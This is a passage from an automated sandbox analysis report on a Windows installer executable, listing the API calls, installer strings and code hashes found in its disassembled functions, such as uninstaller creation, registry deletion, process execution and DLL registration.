                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                          • API String ID: 3734993849-2769509956
                                                                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                          Strings
                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                          • API String ID: 1033533793-945480824
                                                                                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                          Strings
                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                          • GetMessagePos.USER32 ref: 00404871
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                          • MulDiv.KERNEL32(00019000,00000064,?), ref: 00403295
                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                          • wsprintfW.USER32 ref: 00404457
                                                                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s$@rD
                                                                                                          • API String ID: 3540041739-1813061909
                                                                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":
                                                                                                          • API String ID: 589700163-165019052
                                                                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
